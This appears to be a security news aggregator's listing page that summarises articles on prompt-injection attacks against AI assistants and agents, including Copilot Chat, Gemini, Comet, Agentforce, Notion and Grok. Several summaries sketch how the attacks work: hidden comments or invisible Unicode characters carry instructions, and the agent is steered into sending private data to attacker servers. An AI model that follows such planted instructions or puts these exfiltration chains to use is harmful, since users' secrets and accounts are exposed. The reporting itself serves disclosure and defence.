< ciso
brief />
Tag Banner

All news with #prompt injection attack tag

106 articles · page 5 of 6

GitHub Copilot Chat prompt injection exposed secrets

🔐 GitHub Copilot Chat was tricked into leaking secrets from private repositories through hidden comments in pull requests, researchers found. Legit Security researcher Omer Mayraz reported a combined CSP bypass and remote prompt injection that used image rendering to exfiltrate AWS keys. GitHub mitigated the issue in August by disabling image rendering in Copilot Chat, but the case underscores risks when AI assistants access external tools and repository content.
read more →

Security firm urges disconnecting Gemini from Workspace

⚠️FireTail warns that Google Gemini can be tricked by hidden ASCII control characters — a technique the firm calls ASCII Smuggling — allowing covert prompts to reach the model while remaining invisible in the UI. The researchers say the flaw is especially dangerous when Gemini is given automatic access to Gmail and Google Calendar, because hidden instructions can alter appointments or instruct the agent to harvest sensitive inbox data. FireTail recommends disabling automatic email and calendar processing, constraining LLM actions, and monitoring responses while integrations are reviewed.
read more →

Google won’t fix new ASCII smuggling attack in Gemini

⚠️ Google has declined to patch a new ASCII smuggling vulnerability in Gemini, a technique that embeds invisible Unicode Tags characters to hide instructions from users while still being processed by LLMs. Researcher Viktor Markopoulos of FireTail demonstrated hidden payloads delivered via Calendar invites, emails, and web content that can alter model behavior, spoof identities, or extract sensitive data. Google said the issue is primarily social engineering rather than a security bug.
read more →

Gemini Trifecta: Prompt Injection Exposes New Attack Surface

🔒 Researchers at Tenable disclosed three distinct vulnerabilities in Gemini's Cloud Assist, Search personalization, and Browsing Tool. The flaws let attackers inject prompts via logs (for example by manipulating the HTTP User-Agent), poison search context through scripted history entries, and exfiltrate data by causing the Browser Tool to send sensitive content to an attacker-controlled server. Google has patched the issues, but Tenable and others warn this highlights the risks of granting agents too much autonomy without runtime guardrails.
read more →

CometJacking: One-Click Attack Turns AI Browser Rogue

🔐 CometJacking is a prompt-injection technique that can turn Perplexity's Comet AI browser into a data exfiltration tool with a single click. Researchers at LayerX showed how a crafted URL using the 'collection' parameter forces the agent to consult its memory, extract data from connected services such as Gmail and Calendar, obfuscate it with Base64, and forward it to an attacker-controlled endpoint. The exploit leverages the browser's existing authorized connectors and bypasses simple content protections.
read more →

CometJacking attack tricks Comet browser into leaking data

🛡️ LayerX researchers disclosed a prompt-injection technique called CometJacking that abuses Perplexity’s Comet AI browser by embedding malicious instructions in a URL's collection parameter. The payload directs the agent to consult connected services (such as Gmail and Google Calendar), encode the retrieved content in base64, and send it to an attacker-controlled endpoint. The exploit requires no credentials or additional user interaction beyond clicking a crafted link. Perplexity reviewed LayerX's late-August reports and classified the findings as "Not Applicable."
read more →

Smashing Security 437: ForcedLeak in Salesforce AgentForce

🔐 Researchers uncovered a security flaw in Salesforce’s new AgentForce platform called ForcedLeak, which let attackers smuggle AI-readable instructions through a Web-to-Lead form and exfiltrate data for as little as five dollars. The hosts discuss the broader implications for AI integration, input validation, and the surprising ease of exploiting customer-facing forms. Episode 437 also critiques typical breach communications and covers ITV’s phone‑hacking drama and the Rosetta Stone story, with Graham Cluley joined by Paul Ducklin.
read more →

Notion 3.0 Agents Expose Prompt-Injection Risk to Data

⚠️ Notion 3.0 introduces AI agents that, the author argues, create a dangerous attack surface. The vulnerability exploits Simon Willson’s lethal trifecta—access to private data, exposure to untrusted content, and the ability to communicate externally—by hiding executable instructions in a white-on-white PDF that instructs the model to collect and exfiltrate client data via a constructed URL. The post warns that current agentic systems cannot reliably distinguish trusted commands from malicious inputs and urges caution before deployment.
read more →

Generative AI Infrastructure Faces Growing Cyber Risks

🛡️ A Gartner survey found 29% of security leaders reported generative AI applications in their organizations were targeted by cyberattacks over the past year, and 32% said prompt-structure vulnerabilities had been deliberately exploited. Chatbot assistants are singled out as particularly vulnerable to prompt-injection and hostile prompting. Additionally, 62% of companies experienced deepfake attacks, often combined with social engineering or automated techniques. Gartner recommends strengthening core controls and applying targeted measures for each new risk category rather than pursuing radical overhauls. The survey of 302 security leaders was conducted March–May 2025 across North America, EMEA and Asia‑Pacific.
read more →

Critical ForcedLeak Flaw Exposed in Salesforce AgentForce

⚠️ Researchers at Noma Security disclosed a critical 9.4-severity vulnerability called ForcedLeak that affected Salesforce's AI agent platform AgentForce. The chain used indirect prompt injection via Web-to-Lead form fields to hide malicious instructions within CRM data, enabling potential theft of contact records and pipeline details. Salesforce has patched the issue by enforcing Trusted URLs and reclaiming an expired domain used in the attack proof-of-concept. Organizations are advised to apply updates, audit lead data for suspicious entries, and strengthen real-time prompt-injection detection and tool-calling guardrails.
read more →

Salesforce Patches Critical 'ForcedLeak' Prompt Injection Bug

⚠️ Salesforce has released patches for a critical prompt-injection vulnerability dubbed ForcedLeak that could allow exfiltration of CRM data from Agentforce. Discovered and reported by Noma Security on July 28, 2025 and assigned a CVSS score of 9.4, the flaw affects instances using Web-to-Lead when input validation and URL controls are lax. Researchers demonstrated a five-step chain that coerces the Description field into executing hidden instructions, queries sensitive lead records, and transmits the results to an attacker-controlled, formerly allowlisted domain. Salesforce has re-secured the expired domain and implemented a Trusted URL allowlist to block untrusted outbound requests and mitigate similar prompt-injection vectors.
read more →

Critical Salesforce Flaw Could Leak CRM Data in Agentforce

🔒 A critical vulnerability in Salesforce Agentforce allowed malicious text placed in Web-to-Lead forms to act as an indirect prompt injection, tricking the AI agent into executing hidden instructions and potentially exfiltrating CRM data. Researchers at Noma Security showed attackers could embed multi-step payloads in a 42,000-character description field and even reuse an expired whitelisted domain as a data channel. Salesforce patched the issue on September 8, 2025, by enforcing Trusted URL allowlists, but experts warn that robust guardrails, input mediation, and ongoing agent inventorying are needed to mitigate similar AI-specific risks.
read more →

Two-Thirds of Businesses Hit by Deepfake Attacks in 2025

🛡️ A Gartner survey finds 62% of organisations experienced a deepfake attack in the past 12 months, with common techniques including social-engineering impersonation and attacks on biometric verification. The report also shows 32% of firms faced attacks on AI applications via prompt manipulation. Gartner’s Akif Khan urges integrating deepfake detection into collaboration tools and strengthening controls through awareness training, simulations and application-level authorisation with phishing-resistant MFA. Vendor solutions are emerging but remain early-stage, so operational effectiveness is not yet proven.
read more →

CrowdStrike to Acquire Pangea to Secure Enterprise AI

🔒 CrowdStrike announced its intent to acquire Pangea to deliver the industry’s first AI detection and response (AIDR) capability, securing enterprise AI use and development across data, models, agents, identities, infrastructure, and interactions. Unveiled at Fal.Con 2025 by Michael Sentonas, the deal will integrate Pangea’s prompt‑layer and interaction security with the Falcon platform to provide unified visibility, governance, and enforcement across the AI lifecycle. The combined solution targets prompt injection, model manipulation, shadow AI and sensitive data exfiltration while enabling developers and security teams to innovate faster with built‑in safeguards.
read more →

AI-Powered Browsers: Security and Privacy Risks in 2026

🔒 An AI-integrated browser embeds large multimodal models into standard web browsers, allowing agents to view pages and perform actions—opening links, filling forms, downloading files—directly on a user’s device. This enables faster, context-aware automation and access to subscription or blocked content, but raises substantial privacy and security risks, including data exfiltration, prompt-injection and malware delivery. Users should demand features like per-site AI controls, choice of local models, explicit confirmation for sensitive actions, and OS-level file restrictions, though no browser currently implements all these protections.
read more →

Prompt Injection via Macros Emerges as New AI Threat

🛡️ Enterprises now face attackers embedding malicious prompts in document macros and hidden metadata to manipulate generative AI systems that parse files. Researchers and vendors have identified exploits — including EchoLeak and CurXecute — and a June 2025 Skynet proof-of-concept that target AI-powered parsers and malware scanners. Experts urge layered defenses such as deep file inspection, content disarm and reconstruction (CDR), sandboxing, input sanitization, and strict model guardrails to prevent AI-driven misclassification or data exposure.
read more →

Cursor autorun flaw lets repos execute arbitrary code

🔓 Oasis Security disclosed a flaw in Cursor that allows malicious repositories to execute code when a developer opens a folder. The vulnerability stems from Workspace Trust being disabled by default, permitting crafted .vscode/tasks.json entries set to run on folder open to autorun without prompting. Successful exploitation can expose API keys, cloud credentials and local secrets, risking organization-wide compromise.
read more →

New Malware Campaigns: MostereRAT and ClickFix Risks

🔒 Researchers disclosed linked phishing campaigns delivering a banking malware-turned-RAT called MostereRAT and a ClickFix-style chain distributing MetaStealer. Attackers use an obscure Easy Programming Language (EPL), mutual TLS for C2, and techniques to disable Windows security and run as TrustedInstaller to evade detection. One campaign drops remote-access tools like AnyDesk and VNC variants; another uses fake Cloudflare Turnstile pages, LNK tricks, and a prompt overdose method to manipulate AI summarizers.
read more →

Smashing Security #433: Hackers Harnessing AI Tools

🤖 In episode 433 of Smashing Security, Graham Cluley and Mark Stockley examine how attackers are weaponizing AI, from embedding malicious instructions in legalese to using generative agents to automate intrusions and extortion. They discuss LegalPwn prompt-injection tactics that hide payloads in comments and disclaimers, and new findings from Anthropic showing AI-assisted credential theft and custom ransomware notes. The episode also includes lighter segments on keyboard history and an ingenious AI-generated CAPTCHA.
read more →

Threat Actors Use X's Grok AI to Spread Malicious Links

🛡️ Guardio Labs researcher Nati Tal reported that threat actors are abusing Grok, X's built-in AI assistant, to surface malicious links hidden inside video ad metadata. Attackers omit destination URLs from visible posts and instead embed them in the small "From:" field under video cards, which X apparently does not scan. By prompting Grok with queries like "where is this video from?", actors get the assistant to repost the hidden link as a clickable reference, effectively legitimizing and amplifying scams, malware distribution, and deceptive CAPTCHA schemes across the platform.
read more →